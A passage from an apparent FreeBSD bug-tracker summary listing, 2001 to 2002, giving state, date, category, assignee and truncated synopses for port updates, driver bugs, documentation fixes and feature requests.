the filesyste o [2001/12/04] ports/32502 dima port update palm/pilot-link to 0.9.6 o [2001/12/04] ports/32508 ports www/flashplugin-mozilla has malloc bug o [2001/12/04] ports/32517 green Update port: emulators/snes9x to 1.39 s [2001/12/07] docs/32578 doc A _really_ petty change to the front page o [2001/12/07] ports/32582 greid Update port: audio/tempest_for_eliza o [2001/12/07] bin/32588 grog operator should backup vinum vols o [2001/12/08] ports/32604 portmgr Many ports which depends on apache don't f [2001/12/08] misc/32605 nsouch SMBus driver broken o [2001/12/09] ports/32651 ache a small patch to obtain socks5 support to o [2001/12/09] kern/32652 joe A new ioctl to uscanner s [2001/12/09] ports/32653 joe Added patches to improve USB scanner supp f [2001/12/09] bin/32657 sed file handing is non-standard o [2001/12/09] kern/32659 dillon VM and VNODE leak with vm.swap_idle_enabl o [2001/12/09] gnu/32661 dd send-pr uses $LOGNAME for From and Reply o [2001/12/09] docs/32662 dd arp(8) uses "this host" with two differen o [2001/12/10] i386/32666 imp mbufs leaks in dev/ed o [2001/12/10] bin/32667 systat waste too much time reading input o [2001/12/10] kern/32671 imp Patch to generate usbdevs.h automatically o [2001/12/10] docs/32674 doc no man page for the ntp_adjtime system ca a [2001/12/10] bin/32675 kris openssl dhparam hangs when using /dev/ran o [2001/12/10] kern/32677 pciconf -l opens /dev/pci for read/write o [2001/12/10] misc/32680 [PATCH] Allows users to start jails by ho o [2001/12/12] ports/32762 ache Update for archivers/xpk o [2001/12/13] kern/32799 ucom and uplcom drivers ported from NetBS o [2001/12/13] bin/32808 dwmalone [PATCH] tcpd.h lacks prototype for hosts_ o [2001/12/13] kern/32812 roger bktr driver missing tuner for eeprom dete o [2001/12/14] bin/32828 phk w incorrectly handles stale utmp slots wi o [2001/12/15] kern/32880 ambrisko Update aironet driver to correct signal s o [2001/12/16] gnu/32902 Incremental tar archiving using GNU style p [2001/12/16] kern/32912 mp options misssing TCBHASHSIZE o [2001/12/16] ports/32917 portmgr installing ports may fail if $GREP_OPTION o [2001/12/17] ports/32936 mharo ports/security/keyprint only supports S/K o [2001/12/18] conf/32976 assar Kerberos5 config files not installed by d o [2001/12/18] docs/32979 assar manpages are not installed for k5admin an f [2001/12/18] ports/32999 ports New ports: devel/ORBacus4 o [2001/12/19] kern/33004 n_hibma Patch for USB (uhci) o [2001/12/19] misc/33007 n_hibma umass device timeout after successive use o [2001/12/19] misc/33013 cg mixer does not have treble/bass for Sound o [2001/12/19] kern/33014 installkernel without buildkernel gives c o [2001/12/19] conf/33018 Patch for RC (add multiple SSHD configura o [2001/12/21] bin/33066 rwatson sysinstall does not write to new disks as o [2001/12/22] i386/33097 sound Crystal 4237b mixer problems o [2001/12/23] ports/33108 portmgr Generate an error if WRKDIRPREFIX == /usr o [2001/12/23] kern/33117 empty struct md_coredump in pcb.h and use o [2001/12/23] kern/33124 jhb kthread_create doesnt mark kthreads as kt s [2001/12/23] bin/33133 keyinit outputs wrong next login password o [2001/12/23] ports/33134 keith update port: chinese/ghostscript6 for Ado o [2001/12/25] gnu/33182 mp gdb seg faults when given handle SIGALRM o [2001/12/26] ports/33196 portmgr duplicate lines in /usr/ports/INDEX o [2001/12/26] kern/33202 msmith sys/dev/mly/mly.c minor mly_printf cosmet o [2001/12/26] kern/33203 dillon "got bad cookie" errors on NFS client o [2001/12/26] ports/33224 me Build breaks on CURRENT due to 0 o [2002/02/01] ports/34523 ports man pages of nwclient602 install to wrong o [2002/02/01] docs/34529 doc [patch] Grammar nits in usbd.conf(5) and f [2002/02/01] i386/34537 The second NIC card could not get configu o [2002/02/01] gnu/34538 mp_set_memory_functions not extern "C"'d o [2002/02/01] docs/34547 keramida [patch] edits of FAQ Introduction o [2002/02/02] ports/34550 ports ghostscript-gnu-nox11 portversion 6.51 fa o [2002/02/02] ports/34565 ports graphics/blender port is broke o [2002/02/03] docs/34577 doc Some man pages still advise using "confli o [2002/02/03] kern/34591 ICMP bandwidth limiting does not indicate f [2002/02/03] misc/34596 slow gettimeofday in FreeBSD 4.5 o [2002/02/03] ports/34597 eivind [PATCH] Update ports/mail/isync to 0.8 s [2002/02/04] misc/34621 billf i have a patch for (lol) /usr/games/fish o [2002/02/04] docs/34626 doc Copyright on "Index of /mail/current" pag o [2002/02/04] bin/34628 sobomax pkg-routines ignore the recorded md5 chec o [2002/02/04] bin/34629 des fetch(1) cannot download RH 7.2 ISOs from o [2002/02/05] ports/34635 ports games/flightgear o [2002/02/05] kern/34637 LINT is wrong -- NMBCLUSTERS doesn't auto o [2002/02/05] misc/34642 Windows 2000 will not dual boot with Free o [2002/02/05] docs/34654 doc Update UIDs for porters handbook o [2002/02/06] ports/34659 reg Proposed change to Mozilla port's Makefil o [2002/02/06] kern/34665 darrenr ipfilter rcmd proxy "hangs". o [2002/02/06] misc/34673 Second call to select() waits ~100ms befo o [2002/02/06] bin/34676 obrien dhclient always in -q quiet mode (PATCH E o [2002/02/07] gnu/34709 [patch] Inaccurate GDB documentation o [2002/02/07] kern/34712 [patch] SCSI quirk for USB Memorybird o [2002/02/07] ports/34714 ache unzip(1) breaks filenames in non-ASCII ch o [2002/02/07] ports/34717 portmgr bsd.port.mk: extraneous quotes in PTHREAD o [2002/02/07] ports/34718 portmgr make fetch-list includes things make fetc f [2002/02/07] bin/34728 murray DHCP hostname set as Hexadecimal string o [2002/02/08] conf/34729 sheldonh treat smbfs as network file system in /et o [2002/02/08] ports/34737 ports New port: graphics/lodju o [2002/02/08] ports/34742 obrien bash2 missing build dependency on autocon o [2002/02/08] kern/34747 joe Please add USB floppy entry o [2002/02/09] misc/34759 Phantasia does not accept [enter] key f [2002/02/09] ports/34760 ports New port: net/dstumbler a curses based ap o [2002/02/09] conf/34776 rc.diskless1 creates insufficiently sized o [2002/02/10] misc/34788 dwmalone dmesg issues with console output o [2002/02/10] kern/34789 joe PNY brand USB flash readers need 10 byte o [2002/02/10] ports/34796 jmz wrong path in /etc/XF86Config (purely cos o [2002/02/10] ports/34815 pat new port: freenet, the anonymous internet o [2002/02/11] kern/34820 FreeBSD should be able to beep after shut o [2002/02/11] bin/34832 /usr/share/man/cat3/setkey.3.gz linked to o [2002/02/11] bin/34834 "fix" of du(1) and -h o [2002/02/11] ports/34841 dirk Adding cyrus to mod_php o [2002/02/11] bin/34843 fenner `tcpdump port echo' filters for port 4 in o [2002/02/11] misc/34850 scp cannot talk to ssh2 sites that have S o [2002/02/11] kern/34854 /src/sys/dev/sound doesn't work correctly f [2002/02/12] ports/34870 ports new port: lang/pnetlib o [2002/02/12] bin/34874 Netstat output to small o [2002/02/12] ports/34878 chern sysinstall o [2002/02/12] kern/34880 Impossibility of grouping IP into a pipe o [2002/02/13] bin/34919 portmap can not exclusively bind to 127.0 o [2002/02/13] misc/34924 kscd crash on startup signal 11 f [2002/02/14] misc/34935 New locale (Cyrillic Windows Codepage 125 o [2002/02/14] kern/34942 Attempt to play -> "pcm0: play interrupt o [2002/02/14] alpha/34948 alpha Promise TX2 ATA133 controller doesnt work o [2002/02/14] kern/34952 Mouse cursor invisible with USB mice and o [2002/02/15] bin/34955 doc [PATCH] ps(1) is out of touch with realit o [2002/02/15] kern/34963 identify procs belonging to the same jail o [2002/02/15] kern/34965 4.4, 4.5 freeze at boot time on ASUS P2B f [2002/02/15] ports/34975 lioux mplayer don't compile with divx codec f [2002/02/15] ports/34981 ports new port: misc/bibletime: biblestudy appl o [2002/02/15] ports/34987 portmgr bsd.port.mk: silence awk's warning f [2002/02/16] ports/34997 ports xf86cfg core dumps a [2002/02/16] ports/35007 ports New port archivers/arj: ARJ32 v 3.10 russ o [2002/02/16] kern/35010 pcm0 fails to attach with Intel 82801BA ( a [2002/02/16] docs/35011 doc There are no commands called "diskless" o o [2002/02/16] bin/35018 brian enhancing daily/460.status-mail-rejects o [2002/02/17] ports/35037 ports New port: sysutils/cfengine-devel o [2002/02/17] ports/35038 ports cleanup pkg-plist for x11-toolkits/Xaw3d o [2002/02/17] ports/35060 ports New port: deskmenu (GTK root menu applica o [2002/02/17] ports/35062 ports New Port: audio/xmms-mailnotify 0.2.0 o [2002/02/17] kern/35064 ACPI not work with Epox 8KHA+ motherboard o [2002/02/17] bin/35070 math(3) references section "3m", etc. o [2002/02/18] i386/35078 Uninitialized pointer dereference in func o [2002/02/18] ports/35092 ports Xterm termcap should have color capabilit o [2002/02/18] bin/35099 sobomax ldd in -STABLE fails on libc. o [2002/02/18] i386/35101 chern cvusupit and other packages won't extract o [2002/02/19] bin/35109 [PATCH] games/morse: add ability to decod o [2002/02/19] bin/35113 grdc enhancement: countdown timer mode o [2002/02/19] ports/35117 ports Undefined symbol "ldap_get_dn" when tryin o [2002/02/19] i386/35124 No mouse with FreeBSD 4.5 with ECS K7S5a f [2002/02/19] misc/35130 bmah Example dd command for making 4.x install o [2002/02/19] ports/35131 ports New port: unittest framework for c o [2002/02/20] ports/35146 ports New port: A Unit testing framework for Ad o [2002/02/20] bin/35148 ppp/nat-problems after cvs update 4.3 -> o [2002/02/20] gnu/35156 obrien suggestion: hard link /usr/bin/awk to /us o [2002/02/20] ports/35165 ports New port: textproc/smart an information r o [2002/02/20] kern/35171 Moused needs to be enabled to run a USB m o [2002/02/21] misc/35172 Please update am-utils(amd) into newer ve o [2002/02/21] kern/35175 ptrace(PT_DETACH, ....) doesn't do signal o [2002/02/21] ports/35177 chuckr math/gnuplot missing WITHOUT_X11 option o [2002/02/21] conf/35178 ipfilter for IPV6 not availlable in rc.* o [2002/02/21] i386/35182 APMD does not set close on exec for /dev/ o [2002/02/21] ports/35187 ports New port: xmlada - an xml processing libr o [2002/02/21] ports/35190 ports New Port: autoproject o [2002/02/21] kern/35195 msync performance on large files o [2002/02/21] ports/35197 dirk [PATCH] fix "auto-crash" build failure on o [2002/02/22] ports/35204 dirk www/mod_php4 with xslt is not LOCALBASE c o [2002/02/22] ports/35205 ports New port: russian/mtc - Multifile text En o [2002/02/22] docs/35222 doc mailing list archive URL regexp suboptima o [2002/02/22] bin/35226 mtree - strange behaviour on some filenam o [2002/02/23] kern/35234 World access to /dev/pass? (for scanner) o [2002/02/23] conf/35240 Update to etc/services o [2002/02/23] conf/35242 Change to etc/periodic/weekly/330.catman o [2002/02/23] ports/35244 ports proper fix for x11-fm/endeavour's strcase f [2002/02/23] misc/35245 brian unwanted stealth behaviour (inbound icmp o [2002/02/23] ports/35249 ports no man page for latex2html o [2002/02/23] conf/35262 Generation of boot block for headless ope o [2002/02/23] kern/35269 possible panics with 4:1 filesystem ratio o [2002/02/23] ports/35270 ports converters/p5-Convert-TNEF has wrong pkg- o [2002/02/24] docs/35280 doc [PATCH] null-modem cable pinout in 'Seria o [2002/02/24] ports/35285 ports New port textproc/prosper: a LaTeX class o [2002/02/24] kern/35289 Brooktree device doesnt properly signal a o [2002/02/24] ports/35298 ports New port: biology/primer3 o [2002/02/25] kern/35324 Plug and Play probe fails to configure Di o [2002/02/25] ports/35330 ports New port: biology/wise o [2002/02/25] ports/35332 ports New port: biology/flip s [2002/02/25] bin/35333 send-pr(1) vim syntax highlighting suppor o [2002/02/25] ports/35334 ports Please add md2k driver to print/ghostscri o [2002/02/26] docs/35343 doc Old broken Unix docco Makefiles o [2002/02/26] ports/35355 ports New port: databases/gbib f [2002/02/27] ports/35372 ports pgp6 ports fails to compile on alpha plat o [2002/02/27] ports/35375 kde x11/kdebase2 creates files not listed in o [2002/02/27] kern/35377 process gets unkillable (-9) in "ttywai" o [2002/02/27] docs/35378 doc Handbook has inaccurate description of f o [2002/02/27] misc/35381 incorrect floating-point display of large o [2002/02/27] ports/35383 ports new port DarwinStreamingServer o [2002/02/27] kern/35392 atapi tape driver does not maintain devic o [2002/02/27] bin/35393 tjr Patch to add STANDARDS section to strerro o [2002/02/28] misc/35400 sysinstall could improve manipulation of o [2002/02/28] docs/35436 doc PAO isn't very latest-and-greatest these o [2002/03/01] ports/35447 ports Update port: databases/p5-SQL-Statement t o [2002/03/01] bin/35451 PATCH: pkg_add -r able to save local copy o [2002/03/01] bin/35454 mtree can't handle symlinks referencing f o [2002/03/01] ports/35456 portmgr [PATCH] Add a distfiles-list target o [2002/03/01] conf/35457 dual boot problem from 2 different SCSI d s [2002/03/01] ports/35459 ports portupgrade doesn't clean up dependencies o [2002/03/02] ports/35479 ports New Port: A small stand-alone program for o [2002/03/02] ports/35481 ports New port: console text editor looks like o [2002/03/02] docs/35491 green sshd(8) has an incorrect path o [2002/03/03] kern/35512 ATA/ATAPI CD driver: impossible to set cd o [2002/03/03] ports/35514 portmgr Use the value of hw.machine_arch instead o [2002/03/03] ports/35520 ports New port devel/whups: a web-based bug tra a [2002/03/03] bin/35521 nsupdate fails if destination dns is not o [2002/03/03] ports/35522 ports xhtml port uses SGMLDECL in catalog chain o [2002/03/03] docs/35523 doc manpage fixes for df(1) and ls(1) o [2002/03/03] ports/35525 ports update-port: graphics/jpeg2ps-letter o [2002/03/03] i386/35526 No mouse recognized in Compaq Presario la o [2002/03/04] misc/35542 bde BDECFLAGS needs -U__STRICT_ANSI__ o [2002/03/04] conf/35545 Enhanced periodic scripts o [2002/03/04] ports/35549 sada new port editors/texmacs doesn't build on o [2002/03/05] ports/35566 ports new ports: Lire a multiple log files anal o [2002/03/05] ports/35567 ports update port: databases/dbconnect o [2002/03/05] bin/35568 make declares target out of date, but $? o [2002/03/05] docs/35575 doc Pw(8) man page makes no mention of /var/l o [2002/03/05] ports/35578 lkoeller mail/faces: make NAS default since xfaces o [2002/03/05] ports/35580 ports Starup script in /usr/local/etc/rc.d is i o [2002/03/06] ports/35594 ports Bug: misc/kwatch fails to build if autoco f [2002/03/06] i386/35599 murray install o [2002/03/06] docs/35602 doc dump(8)/restore(8) pages don't explain "a o [2002/03/06] docs/35607 doc dump(1) page needs discussion of scary er o [2002/03/06] docs/35608 doc mt(1) page uses "setmark" without explana o [2002/03/06] docs/35609 doc mt(1) page needs explanation of "long era o [2002/03/06] docs/35612 doc ps(1) page "state" description doesn't me o [2002/03/06] ports/35617 lkoeller mail/faces: add USE_SOX, WITHOUT_AUDIO kn o [2002/03/07] kern/35635 sheldonh [patch] missing dep in libiconv prevents o [2002/03/07] ports/35638 markm tn3270 dumps core unconditionally o [2002/03/07] ports/35639 ports executable name conflicts: ploticus and s o [2002/03/07] docs/35642 doc lo(4) page maybe should document optional o [2002/03/07] docs/35644 doc lo(4) page presumes familiarity with prin o [2002/03/07] docs/35646 doc cp(1) page needs a "Bugs" section. o [2002/03/07] docs/35647 doc www; combine query-by-number and multi-fi o [2002/03/07] docs/35648 doc rc.conf; add note about "flags" to both f o [2002/03/07] docs/35649 doc mount_smbfs(8) page: "See ./examples/dot. o [2002/03/07] ports/35661 ports new port: mycb o [2002/03/07] ports/35666 portmgr new bsd.port.mk support for GCC 2.95 and o [2002/03/08] ports/35667 ports net/pppload patch so it doesn't show wron o [2002/03/08] ports/35668 ports Link sqsh with readline o [2002/03/08] ports/35670 ports /usr/ports/databases/sqsh - bogus depende o [2002/03/08] bin/35671 wrong comments in rc.diskless1 o [2002/03/08] ports/35682 ports apache13-ssl needs update o [2002/03/08] docs/35686 doc blackhole(4) page seems to contradict its o [2002/03/08] docs/35687 doc /etc/nsmb.conf missing mention of readers o [2002/03/08] docs/35696 doc mount_smbfs(8) references a nonexistent n o [2002/03/08] kern/35699 [PATCH] msdosfs: differrent masks for dir o [2002/03/08] kern/35700 a small code update o [2002/03/09] ports/35708 ports New port: audio/abcmidi utilities for abc o [2002/03/09] ports/35710 portmgr Request repocopy: devel/automake -> devel o [2002/03/09] docs/35711 des the "gnats page" should move to its own s o [2002/03/09] bin/35717 which(1) returns wrong exit status for m o [2002/03/09] misc/35727 man(1) program should not display (old) d o [2002/03/10] docs/35732 doc adduser(8) page has obsolete reference an o [2002/03/10] ports/35737 ports New port: audio/abcselect - extract part o [2002/03/10] ports/35753 ports New Port: biology/act o [2002/03/10] ports/35762 ports Speak Freely hangs while reading from aud o [2002/03/11] misc/35764 Icewm does not display APM status properl o [2002/03/11] ports/35767 portmgr make_index script does not deal with syml o [2002/03/11] bin/35769 w does not correctly interpret X sessions f [2002/03/11] ports/35784 ports reposting pic2fig port as a diff against o [2002/03/11] docs/35800 obrien [PATCH] removal of -kthread in gcc man pa o [2002/03/11] bin/35812 strings(1) does'n print russian character o [2002/03/11] kern/35813 dwmalone Add another Askey ISA modem o [2002/03/12] docs/35823 doc [PATCH] Little Restructuring of the Devel o [2002/03/12] ports/35833 ports ports/chinese/arphicttf and CJK depend on o [2002/03/12] bin/35838 Change to size of WID_IF in usr.bin/netst o [2002/03/13] kern/35846 timeout in wi_cmd 11, machine hangs for a o [2002/03/13] ports/35859 ports New port: Network traffic accounting daem o [2002/03/13] kern/35861 brooks if_vlan module is compiled with ZERO vlan o [2002/03/13] ports/35864 ports ports with invalid dependencies to glib13 o [2002/03/13] misc/35865 pam_krb5 crashes in pam_sm_setcred() o [2002/03/13] kern/35876 bus_dmamem_free does not call contigfree o [2002/03/13] ports/35879 portmgr autoconf-2.52_2 creates empty case/esac s o [2002/03/13] ports/35882 ports Perl Expect module send_slow hangs on EOF o [2002/03/13] kern/35883 probe for ATI Rage128 Pro o [2002/03/14] bin/35886 [patch] Enhancement: custom time format f o [2002/03/14] bin/35894 bbraun popen.c in cron won't build without LOGIN o [2002/03/14] ports/35897 ports upgrading the linux_base port runs into t o [2002/03/14] kern/35900 Changing RealTek 8139 MAC address fails f [2002/03/14] misc/35918 Xset , XTGA and Xhtml Damaged o [2002/03/14] ports/35919 ports CompuPic 5.1.1016 o [2002/03/15] ports/35927 portmgr Permission sought to commit this automake o [2002/03/15] ports/35937 ports New port: taipan-0.9 o [2002/03/15] docs/35939 doc ipfw(8) needs explicit statement about no o [2002/03/15] docs/35941 doc cd(4) manual doesn't mention "target" use o [2002/03/15] docs/35942 doc at(1) manual doesn't describe at.allow an o [2002/03/15] docs/35943 doc at(1) config files are misplaced in /var/ o [2002/03/15] ports/35946 ports The /usr/local/lib/RealPlayer8/postinstal o [2002/03/15] docs/35948 trhodes disklabel(8) manual uses archaic "pack" a a [2002/03/15] docs/35951 trhodes disklabel(8) manual confuses partitions a o [2002/03/15] docs/35953 doc hosts.equiv(5) manual is confusing or wro p [2002/03/15] docs/35967 keramida rc.conf(5) manual missing "dumpdir" and " o [2002/03/16] kern/35978 improve kobj method dispatch o [2002/03/16] kern/35988 Seimens SpeedStream PCI/PCMCI Adaptor for o [2002/03/16] kern/35993 murray sys/dev/amr/amr.c - Compiler warnings und o [2002/03/16] ports/35995 ports New port: ophoto o [2002/03/16] kern/35999 add support for general flash disks to sc f [2002/03/17] bin/36000 contrib/amd uses mktemp o [2002/03/17] ports/36020 jmz Update port: print/musixtex T.98 -> T.104 o [2002/03/17] ports/36024 sobomax port update: OpenJIT 1.1.16 for JDK 1.3.1 o [2002/03/17] ports/36026 steve Update port: x11-toolkits/open-motif to 2 o [2002/03/17] ports/36034 ports new port databases/pg-crypto o [2002/03/18] ports/36047 znerd New port java/jbuilder-personal o [2002/03/18] docs/36055 doc [PATCH] adding some help-yourself-info to o [2002/03/18] ports/36061 perky New port: net/jmsn s [2002/03/18] standards/36076standardsImplementation of POSIX fuser command o [2002/03/18] ports/36078 portmgr Fix MASTER_SITES_NN recursive bug o [2002/03/18] ports/36079 portmgr Support USE_LESSTIF=yes o [2002/03/18] ports/36080 portmgr Support USE_OPENSSL=yes on 4.2 o [2002/03/18] ports/36083 portmgr Installs existing packages for dependecie o [2002/03/19] standards/36087tjr P1003.1-2001 c99 utility o [2002/03/19] ports/36089 ports new port: net/isba - a Perl/Tk GUI for ip o [2002/03/19] misc/36110 dmesg output corrupt if /dev/console is b o [2002/03/19] ports/36112 portmgr [PATCH] New feature for whole ports tree: o [2002/03/19] ports/36113 dirk Add gdbm, BerkeleyDB2, BerkeleyDB3, libio o [2002/03/19] conf/36118 re 4.5 Upgrade says it won't touch /usr/src, o [2002/03/20] ports/36129 ports Update Port:databases/libiodbc(support pt p [2002/03/20] standards/36130standardsP1003.2 asa utility is missing o [2002/03/20] bin/36136 savecore -z option does not work o [2002/03/20] misc/36143 Dynamic (non linear) mouse acceleration a o [2002/03/20] misc/36153 /usr/src/games/fortune/README instruction o [2002/03/20] misc/36154 Getting USB mouse to work: usbd and mouse o [2002/03/21] ports/36162 ports New Port: p5-IO-Socket-Multicast o [2002/03/21] misc/36165 boehm-gc BUS error with gdb o [2002/03/21] kern/36170 an(4) does an_init() even if interface is o [2002/03/21] ports/36178 ports New Port: bozohttpd-0.59 o [2002/03/21] ports/36186 ports New Port: www6to4 version 1.5 o [2002/03/21] bin/36189 [ftpd] it can not send a file on NTFS in p [2002/03/21] standards/36190tjr P1003.1-2001 newgrp command f [2002/03/22] ports/36202 wosch update to sysutils/socket: NetBSD IPv6 pa o [2002/03/23] ports/36238 sf [patch] ftp/wget doesn't respect FTP_PASS o [2002/03/24] misc/36250 grog /dev/vinum device entries have a group of o [2002/03/24] ports/36251 ports New port: lang/cocor (Coco/R, a compiler a [2002/03/24] ports/36252 petef Fix build of misc/Howto / take maintainer o [2002/03/24] ports/36260 sobomax freetype2 needs libintl.so.1 in gettext-0 o [2002/03/24] bin/36262 [PATCH] Fixed rusers idle-time reporting o [2002/03/24] kern/36274 75GXP drive ATA tagging failure makes df o [2002/03/26] alpha/36327 alpha trap within cvt() while attempting to pri o [2002/03/26] ports/36336 ports port of ccmalloc o [2002/03/26] ports/36341 dburr [patch] devel/SN marked as broken o [2002/03/26] misc/36359 fxp driver and Intel Pro/100 S NIC (0002B o [2002/03/26] ports/36361 ports apache13-ssl installs 'httpsd.conf' and l o [2002/03/26] ports/36364 ports apache13-ssl - 'make certificate' fails o [2002/03/27] misc/36368 sshd error: session_close_by_channel: ki o [2002/03/27] bin/36374 Patch (against core dumps) and improvemet o [2002/03/27] kern/36381 ata + hw.ata.wc=1: high CPU load for larg o [2002/03/27] misc/36385 luigi crunchgen does not handle Makefiles with o [2002/03/27] ports/36386 adrian www/squid24 might overwrite perms on log o [2002/03/27] misc/36392 cron starts before vi recover, and vi rec o [2002/03/27] bin/36397 sos incorrect information in ata(4) o [2002/03/27] kern/36410 Bad mac address return from FNW-9803-T (A o [2002/03/28] conf/36416 imp Addition to /etc/defaults/pccard.conf o [2002/03/28] bin/36418 imp pccardd added option to exit after probe o [2002/03/28] kern/36425 bump up SYS_NMLN in sys/utsname.h o [2002/03/28] bin/36431 src/secure/lib/libtelnet fails in CURRENT o [2002/03/28] docs/36432 doc Proposal for doc/share/mk: make folded bo o [2002/03/28] docs/36449 doc symlink(7) manual doesn't mention trailin s [2002/03/28] ports/36452 ports Update port: security/fwlogwatch to 0.7 o [2002/03/28] docs/36459 doc tftp(1) manual's "get" syntax/description o [2002/03/28] gnu/36460 cu(1) program does not work very well. f [2002/03/28] ports/36466 cy please remove biology/seaview o [2002/03/28] bin/36470 dwmalone chpass(1) program has erroneous "usage" f f [2002/03/29] bin/36477 gshapiro mailwrapper doesn't handle rmail calls o [2002/03/29] bin/36501 /usr/bin/calendar can't handle recurring o [2002/03/29] ports/36503 ports several files conflict in ports/databases o [2002/03/29] docs/36524 doc bad links on handbook index page f [2002/03/30] ports/36531 ports let eterm with chinese support o [2002/03/30] misc/36536 Apparent mother board incompatability o [2002/03/30] misc/36541 portmgr port: make install as normal user retries o [2002/03/30] ports/36545 jmz mwrite is an absolute symbolic link to /u o [2002/03/30] bin/36553 Two new features in newsyslog(8) o [2002/03/30] misc/36556 patch: regular expressions for tcpwrapper o [2002/03/30] ports/36557 perky Fix port: security/py-amkCrypto (to refle o [2002/03/30] ports/36560 rse bug fix for the eperl package o [2002/03/30] ports/36561 nakai slib package bug fix o [2002/03/30] bin/36564 fdisk(8) program has misplaced NOT_NOW bl o [2002/03/31] ports/36568 vanilla New port: chinese/chinput3 o [2002/03/31] kern/36569 umass fails when RiteLink Pocket Disk is o [2002/03/31] ports/36575 hoek Update port: converters/uudeview|converte o [2002/03/31] ports/36582 taoka Update port: japanese_kinput2-freewnn to o [2002/03/31] ports/36587 des news/inn{-stable} do not install when --e f [2002/04/01] ports/36619 ports A gtk SMB share browser o [2002/04/01] ports/36622 dburr [patch] devel/SN : Upgrade port to versio o [2002/04/01] bin/36626 login_cap(3) incorrectly claims that all o [2002/04/01] docs/36628 doc header an footer of openssl manpages are o [2002/04/01] docs/36629 kris OpenSSL manpages should be reachable with o [2002/04/01] bin/36634 murray dhclient is quiet and cannot be made loud o [2002/04/01] ports/36644 ports new port -- gtkspell o [2002/04/01] misc/36646 dwmalone [PATCH] Top does not work correctly in a o [2002/04/02] kern/36682 USB isochroneous transfer doesn't report o [2002/04/02] ports/36684 ports patch for http://www.freebsd.org/cgi/quer o [2002/04/02] ports/36685 ports annoying warnings from mc with tcsh in ho o [2002/04/03] kern/36692 Patch for E-Tech ISA PnP modem support o [2002/04/03] ports/36709 portmgr bsd.port.mk MASTER_SITES:n - add comma op o [2002/04/03] docs/36723 doc IPSec section is unintelligible o [2002/04/03] docs/36724 doc ipnat(5) manpage grammar is incomplete an o [2002/04/03] docs/36726 doc Handbook lacks information about hardware o [2002/04/03] docs/36727 trhodes Mail chapter of Handbook is incomplete o [2002/04/03] docs/36728 doc Handbook does not document VINUM o [2002/04/04] bin/36740 make ps obey locale (particularly for tim o [2002/04/04] bin/36757 EnhancementRequest binary which ought to o [2002/04/04] ports/36766 portmgr Incompatibility between autoconf, automak o [2002/04/05] bin/36785 Add support for $ character in usernames o [2002/04/05] bin/36786 make ps use 24-hour time by default o [2002/04/05] ports/36792 ports Fix pkg-plist of shells/perlsh o [2002/04/05] ports/36795 kuriyama DocBook DSSSL stylesheets should install o [2002/04/05] ports/36801 ports Update port: misc/compat3x o [2002/04/05] ports/36802 ports Update port: misc/compat4x o [2002/04/05] ports/36806 portmgr bsd.port.mk MASTER_SITES:n group protecti o [2002/04/06] ports/36828 sobomax Mesa3 port broken when using XFREE86_VERS o [2002/04/06] ports/36832 ports apache13-* coredumps when using XML::Pars o [2002/04/06] docs/36837 jim Handbook lacks information about setting o [2002/04/07] ports/36841 ports use of .MAKEFLAGS target in Makefile.loca o [2002/04/07] kern/36845 Add ioctls CDRIOCREADSPEED/WRITESPEED to o [2002/04/07] ports/36849 cy FVWM-Themes fails to switch themes f [2002/04/07] bin/36859 sos burncd fails in dao mode for audio o [2002/04/08] bin/36884 add support id_rsa (OpenSSH/RSA2) authent o [2002/04/08] ports/36887 tobez Update port: www/p5-CGI.pm 2.753 to 2.80 o [2002/04/08] ports/36901 glewis WITHOUT_X11 Knob for port java/jdk13 o [2002/04/08] bin/36902 [patch] proposed new format code %N for s o [2002/04/08] ports/36913 ports New port: devel/ruby-rbprof o [2002/04/08] misc/36916 DOS active partition flag lost in libdisk f [2002/04/09] misc/36923 fdesc file system (partially) crashes Fre o [2002/04/09] ports/36932 ports New Port: scmxx 0.6.0 (Data Exchange util o [2002/04/09] ports/36933 portmgr [PATHCES] New feature for pkg_create and o [2002/04/09] ports/36939 ports New Port: devel/popenhs -- A popen-like l o [2002/04/09] ports/36940 ports Port update acid-0.9.6b20 to acid-0.9.6b2 o [2002/04/09] ports/36945 ports new ports of libsigc++12 and gtkmm o [2002/04/09] ports/36951 glewis Java (aka 1.3.1-p6-root-020405-00:26) cor o [2002/04/09] kern/36952 ldd comand of linux does not work p [2002/04/09] bin/36955 yar Stock ftpd does not reuse ports in passiv o [2002/04/10] ports/36959 ports New port: Gnewtellium is yet another new o [2002/04/10] bin/36960 calendar doesn't effect -t option. o [2002/04/10] ports/36962 obrien new version of news/aub o [2002/04/10] ports/36967 ports New port: news/slrnface o [2002/04/10] kern/36983 CD9660 unicode to utf-8 [hack] o [2002/04/11] conf/36990 pccard I/O DATA PCET10-CL worked o [2002/04/11] ports/37000 ports New Port: agqt 0.9.1 (Audiogalaxy query t o [2002/04/11] ports/37002 ports Port Update: (security/fwlogwatch) from 0 o [2002/04/11] ports/37003 ports new port: misc/susv2 (Single UNIX Specifi o [2002/04/11] ports/37004 ports new port: misc/susv3 (Single UNIX Specifi o [2002/04/11] bin/37013 ls directory name output trailing slash d f [2002/04/12] ports/37019 ports New port: poink 1.5 (Nosuid, secure ping o [2002/04/12] ports/37020 ports New port: www/muwi o [2002/04/12] ports/37027 ports New port: lookout-1.1 (Outlook 97 address o [2002/04/12] ports/37028 perky New port: www/scgi o [2002/04/13] misc/37034 Fixed maximum character length in EUC o [2002/04/13] docs/37037 keramida Cleaned and revised the Hubs article o [2002/04/13] ports/37044 ports lesstif needs an update o [2002/04/13] misc/37047 brian daily_status_mailq_shorten doesn't produc o [2002/04/13] kern/37052 Quirk: ADS Tech Drive Kit 2.0 USB DA_Q_N o [2002/04/14] ports/37054 ports Problem report: (misc/flexbackup) doesnt o [2002/04/14] ports/37059 ports New port: gtk-iminc o [2002/04/14] ports/37062 ports New port: textproc/pocketreader o [2002/04/14] ports/37066 ports ports/databases/postgresql-tcltk is not u o [2002/04/14] misc/37073 Few new tips for FreeBSD-tips fortune o [2002/04/14] bin/37074 [PATCH] Typographical error in output of o [2002/04/14] bin/37079 des fetch complains about "size of remote fil o [2002/04/14] bin/37083 small improvement to talk(1): add clocks o [2002/04/15] ports/37095 ports ports/net/p5-Net-SSH-Perl already builds o [2002/04/15] bin/37096 Fixes to fsdb command-line handling [patc o [2002/04/15] ports/37098 nakai Update patches for slib port f [2002/04/15] ports/37100 ports Maintainer update: textproc/dico (portsur o [2002/04/15] ports/37111 ports new port: net/ccmsn o [2002/04/15] ports/37123 ports New port: net/arpd o [2002/04/15] ports/37128 ports New port: www/sarg, formerly known as www o [2002/04/16] i386/37137 FreeBSD install doesn't recognize version o [2002/04/16] misc/37160 qa /stand/sysinstall coredumps when trying t o [2002/04/16] misc/37161 ext2 linux file system, 